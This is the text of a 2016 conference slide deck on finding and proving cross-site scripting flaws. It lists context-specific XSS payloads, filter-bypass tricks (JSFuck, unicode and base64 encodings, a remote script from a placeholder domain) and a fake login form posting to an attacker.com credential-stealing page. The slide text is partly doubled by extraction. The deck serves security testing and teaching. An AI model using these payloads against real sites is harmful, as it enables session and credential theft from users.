Non-Esoteric XSS Tips & Tricks
-
Upload
miroslav-stampar -
Category
Technology
-
view
362 -
download
1
Transcript of Non-Esoteric XSS Tips & Tricks
![Page 1: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/1.jpg)
Non-Esoteric XSSNon-Esoteric XSSTips & TricksTips & Tricks
Miroslav Štampar
([email protected]; [email protected])
Non-Esoteric XSSNon-Esoteric XSSTips & TricksTips & Tricks
Miroslav Štampar
![Page 2: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/2.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2
XSS (Cross-Site Scripting)XSS (Cross-Site Scripting)Injection attack against usersagainst users of (otherwise)
benign and trusted web sitesUsed mostly in targetedtargeted attacks (e.g. spear-
phishing against administrators)For example, an attacker can send a link with
malicious JavascriptJavascript (JS) code to an unsuspecting user
The user’s browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within browsing contextwithin browsing context
![Page 3: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/3.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 3
Real-world (known) casesReal-world (known) cases
![Page 4: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/4.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 4
More about vulnerabilityMore about vulnerabilityConsidered as criticalcritical vulnerability, hence
(often) well paid in bug bounty programsFailure to (properly) sanitize/filtersanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability
While testing, responses for user supplied values are being inspected for signs of the vulnerability (e.g. response returning values in originaloriginal form)
Provoking JS pop-up boxpop-up box with custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of vulnerability
Types: storedstored (persisting), reflectedreflected (temporary) and DOM-basedDOM-based (in-browser)
![Page 5: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/5.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 5
Food for thought :)Food for thought :)
![Page 6: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/6.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 6
Testing workflowTesting workflow
1) Find reflecting inputinput points(e.g. page's GET parameter values)
2) Recognize contextcontext of reflection(e.g. inside <script>...</script>)
3) BypassBypass sanitization/filtering and/or protection mechanism(s)(Note: if possible and/or required)
4) Write vulnerability exploitation PoCPoC(e.g. ...alert('XSS')...)
![Page 7: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/7.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 7
Practical example (PoC)Practical example (PoC)
![Page 8: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/8.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 8
Protection mechanism(s)Protection mechanism(s)
Common (XSS) detection regular expressions:● /<[az]/i - (e.g.) <svg, <img - though, there are
cases where “benign” tags as <a> are left un-blacklisted
● /\b(java)?script\b/i - (e.g.) <script, <img src="javascript:, etc.
● /\bon\w+\s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted
● /\bsrc\s*=/i - (e.g.) <embed src=..., etc.● /\b\w+\(/i - (e.g.) alert( - though, there are
cases where confirm( is left un-blacklisted
![Page 9: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/9.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 9
Sanitization mechanism(s)Sanitization mechanism(s)Common (XSS) server response sanitizations:
● Removing all special characters - (e.g.) foo<'">bar → foobar
● Replacing with whitespace all special characters - (e.g.) foo<'">bar → foo bar
● HTML named entity encoding - (e.g.) foo<'">bar → foo<'">bar
● HTML numeric code point encoding - (e.g.) foo<'">bar → foo<'">bar
● Backslash escaping all special characters - (e.g.) foo<'">bar → foo\<\'\"\>bar (Note: <script>)
● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
![Page 10: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/10.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 10
Break-out of <tag...> context with > OR onXXX event handler injection
?vuln="><svg onload=alert(/XSS/)>
?vuln=" onclick="alert(/XSS/)
Usability is highly dependent on context and available <tag> events
(e.g.) Tags having visibility: hidden require breaking out of <tag...> context
<tag...><tag...> ( (|more|more))
![Page 11: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/11.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 11
<tag...><tag...> ( (|more|more))Even though attacker's options inside <tag> are
pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help
?vuln=" onmouseover=alert(/XSS/) style="display: block; position: absolute; left: 0; top: 0; height: 10000px; width: 10000px; opacity: 0; cursor: default
![Page 12: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/12.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 12
>...<>...<Injecting outside of <tag> context and/or scope
(e.g. </script>...) requires unfiltered < and >Proper “Contenttype” (e.g. “text/html”) is
required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest)
?vuln=<img src=null onerror=alert(/XSS/)>
?vuln=<script>alert(/XSS/)</script>
![Page 13: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/13.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 13
<!...><!...>Requires breaking-out of <!...> (i.e. HTML
comment) context with >Common for (custom) sites with debugging
support turned ON (e.g. returning used SQL query inside comment)
?vuln=><svg onload=alert(/XSS/)>
As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[azAZ] inside parameter values)
![Page 14: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/14.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 14
<frame ...><frame ...>Injecting custom <frame> OR onload event
handler injection (prefered)?vuln="><frame src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
?vuln=" onload="alert(/XSS/)
Note: Non-<frame> tags can't be used because of <frameset> restrictions
![Page 15: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/15.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 15
<iframe...><iframe...>
Break-out of <iframe...> context OR onload event handler injection (prefered)
?vuln="></iframe><svg onload=alert(/XSS/)>
?vuln=" onload="alert(/XSS/)
![Page 16: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/16.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 16
<input...><input...>
Break-out of <input...> context with > OR onfocus event handler injection (prefered)
?vuln=1"><svg onload=alert(/XSS/)>
?vuln=1" autofocus onfocus="alert(/XSS/)
![Page 17: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/17.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 17
<input type<input type="hidden"="hidden"...>...>
In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work
Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (AltShift<key>)
?vuln=" accesskey="X" onclick="alert( /XSS/)
![Page 18: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/18.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 18
<script>...</script><script>...</script>Break-out of <script>...</script> with </script> OR in-place JS injection (prefered)
?vuln=</script><svg onload=alert(/XSS/)>
?vuln=foobar');alert('XSS');var dummy=('
Common in third-party advertisement pluginsNote: In-place JS injection doesn't require <>,
though it requires unfiltered ' or " in majority of cases (interpreter syntax checksinterpreter syntax checks)
![Page 19: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/19.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 19
echo $_SERVER['PHP_SELF']echo $_SERVER['PHP_SELF']
Common finding even on top sites and/or frameworks
Non-sanitized reference of current script's path
http://...php/"><svg onload="alert(/XSS/)
Not PHP-specific (though more common)Note: JS injection in path often require manual
URL encoding of non-alphanumeric characters
![Page 20: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/20.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 20
<meta><meta>Often mislooked, though easy to exploitTop sites tend to utilize lots of metadata?vuln="><script>alert(/XSS/)</script>
?vuln=0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" httpequiv="refresh
![Page 21: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/21.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 21
<textarea> <textarea> andand <title> <title>
Injection into <textarea> and <title> enclosings require explicit (respectable) closing tagsclosing tags (i.e. </textarea> and </title>)
Important to note because of automatized scanners (majority don't check the context)
<style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used
?vuln=</textarea><svg onload=alert(/XSS/)>
![Page 22: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/22.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 22
$_POST$_POST
Though not exploitable directly from link (i.e. address bar), it is a perfectly valid attack point
Requires malicious HTMLmalicious HTML document that has to be loaded inside the victim's web browser
Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document
![Page 23: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/23.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 23
Protection(s) bypasses (Protection(s) bypasses (|more|more))<svg/onload=alert(/XSS/)>prompt`XSS`onerror=confirm;throw/XSS/;document.write(String.fromCharCode(60, 115,99,114,105,112,116,62,97,...
[][(![]+[])[+[]]+([![]]+[][... // JSFuck<SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT><embed src=data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM...
<object data=data:text/html;base64,...<video/poster/onerror=alert(/XSS/)></i/style=left:ex\pression(alert('XSS'))>
![Page 24: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/24.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 24
Protection(s) bypasses (Protection(s) bypasses (|more|more))<iframe src=javascript:alert('XSS')><isindex type=submit formaction=javascrip...
<isindex type=image src=null onerror=alert(/XSS/)>
<iframe/srcdoc=<svg/onload=alert("XSS")>>
<img src=null onerror=\u0061\u006c\u0065\u0072\u0074("\u0058\u0053\u0053")>
<body style=height:9999px onwheel=prompt(/XSS/)>
<marquee onstart=confirm(/XSS/)>
![Page 25: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/25.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 25
In cases when Javascript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable
Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever
“Evil link” scenario – (e.g.) “Fake login” scenario – (e.g.) <form
action="//www.attacker.com/steal.php">...“Fake defacement” scenario – (e.g.) <h1>This
site has been hacked by l33tcr3w</h1>
p.s. HTML injectionp.s. HTML injection
![Page 26: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/26.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 26
www.openbugbounty.org
html5sec.org
p.p.s. Recommended resourcesp.p.s. Recommended resources
![Page 27: Non-Esoteric XSS Tips & Tricks](https://reader037.fdocuments.us/reader037/viewer/2022103105/58cfcc331a28ab7c6e8b5a59/html5/thumbnails/27.jpg)
FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 27
Questions?Questions?